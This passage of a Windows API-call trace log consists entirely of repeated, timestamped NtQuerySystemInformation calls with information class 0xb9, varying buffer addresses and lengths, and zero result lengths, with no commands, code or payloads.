SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0c0, Length=0x28, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0271.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.685] NtQuerySystemInformation (SystemInformationClass=0xb9, 